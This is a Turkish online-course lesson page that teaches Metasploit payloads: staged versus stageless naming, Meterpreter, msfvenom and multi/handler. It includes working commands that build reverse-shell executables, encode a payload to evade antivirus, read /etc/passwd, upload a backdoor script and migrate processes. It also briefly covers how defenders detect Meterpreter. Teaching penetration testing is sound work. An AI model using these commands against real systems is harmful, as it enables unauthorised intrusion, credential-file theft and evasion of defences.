Yükler: Aşamalı ve Aşamasız, Meterpreter
Bir senaryo için doğru yükü seçin ve istismar sonrası işlemler için Meterpreter kullanın.
Yükler: Aşamalı ve Aşamasız, Meterpreter, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 3. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.
Yük Nedir?
Yük, başarılı bir istismardan sonra hedefte çalışan koddur. Saldırganın ne elde edeceğini tanımlar: bir kabuk, komut çalıştırma, dosya erişimi veya Meterpreter gibi tüm özelliklere sahip bir ajan.
Aşamalı ve Aşamasız Yükler
Stageless yükler (/) her şeyi tek bir ikili dosyada içerir; daha büyüktür ancak daha basittir ve ilk gönderimden sonra ağ üzerinden geri bağlantı gerekmez. Staged yükler (//) önce küçük bir başlatıcı gönderir; bu başlatıcı ikinci aşamayı işleyiciden indirir.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsHer Birini Ne Zaman Kullanmalı?
İlk istismardan sonra hedefin internet veya işleyici erişimi yoksa stageless kullanın; yük kendi kendine yeterli olmalıdır. Daha küçük bir ilk yük istediğinizde ve güvenilir bir işleyici bağlantınız olduğunda staged kullanın.
Meterpreter'e Genel Bakış
Meterpreter, Metasploit'in gelişmiş yüküdür; tamamen bellekte çalışır, şifreli iletişim kullanır ve dosya sistemine erişim, süreç taşıma, tuş kaydı, ekran görüntüsü alma ve ara sistem üzerinden geçiş gibi zengin bir programlama arayüzü sağlar.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runMeterpreter Komutları
İstismar sonrası için temel Meterpreter komutları: sistem bilgileri, süreç listesi, dosya işlemleri ve ağ işlemleri.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellSüreç Taşıma
Meterpreter sürecini daha kararlı veya daha az şüpheli bir sürece taşıyın (örneğin Windows'ta explorer.exe). Daha yüksek ayrıcalıklı bir sürece taşıma, ayrıcalıkları da yükseltebilir.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsmsfvenom ile Yük Oluşturma
msfvenom, yetkili sınamalarda kimlik avı, USB bırakma saldırıları veya web kabukları aracılığıyla gönderilmek üzere bağımsız yük dosyaları (EXE, ELF, APK ve kabuk kodu) oluşturur.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfKabukları Yakalamak için multi/handler
multi/handler yardımcı modülü ters kabuk bağlantılarını yakalar. Yükü göndermeden önce, msfvenom'da kullandığınız yükü, LHOST'u ve LPORT'u kullanarak yapılandırın.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobKodlama ve Savunmaları Aşmanın Temelleri
msfvenom kodlayıcıları, temel imza tabanlı AV algılamasından kaçınmak için yükleri gizleyebilir. Not: modern EDR davranışsal algılama kullanır; tek başına kodlayıcılar gelişmiş savunmalara karşı yeterli değildir.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exeBağlama ve Ters Bağlantı Yükleri
Ters bağlantı yükleri hedeften saldırgana bağlanır (NAT ve güvenlik duvarları için daha uygundur). Bağlama yükleri hedefte dinleme yapar; saldırgan içeri bağlanır. Çoğu senaryoda ters bağlantı tercih edilir.
Savunmacıların Yükleri Algılaması
Savunmacılar Meterpreter'i şu yollarla algılar: ağ imzaları (C2 trafik örüntüleri), bellek taraması (yansıtmalı DLL enjeksiyonu kalıntıları) ve davranış analizi (süreç boşaltma, olağandışı üst-alt süreç ilişkileri).
Hızlı Kontrol
Metasploit'te aşamalı bir yükü aşamasız bir yükten ayıran nedir?
Özet: Yükler ve Meterpreter
Küçük bir ilk ayak izi için aşamalı, kendi kendine yeterli gönderim için aşamasız yükleri seçin. Meterpreter, istismar sonrası için en yetenekli yüktür: bellekte çalışır, şifrelenmiştir ve genişletilebilir. Bağımsız ikili dosyalar oluşturmak için msfvenom'u kullanın ve geri bağlantıları yakalamak için multi/handler'ı her zaman yapılandırın.
Yapay zeka eğitmeniyle Cyber Security Academy öğren — ücretsiz
Tarayıcında gerçek kod yaz ve çalıştır, 7/24 yapay zeka eğitmeninden anında yardım al; web'de ya da uygulamada kaldığın yerden devam et.
- Kurslar
- 76
- Dersler
- 303
Sıkça Sorulan Sorular
“Yükler: Aşamalı ve Aşamasız, Meterpreter” dersi ücretsiz mi?
Evet — “Yükler: Aşamalı ve Aşamasız, Meterpreter” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.
“Yükler: Aşamalı ve Aşamasız, Meterpreter” dersinde ne öğreneceğim?
Bir senaryo için doğru yükü seçin ve istismar sonrası işlemler için Meterpreter kullanın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 3. dersidir.
“Yükler: Aşamalı ve Aşamasız, Meterpreter” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- Metasploit Mimarisi ve msfconsole
- Bilinen Bir Güvenlik Açığını İstismar Etme
- Yükler: Aşamalı ve Aşamasız, Meterpreter
- İstismar Sonrası: Pivot ve Kalıcılık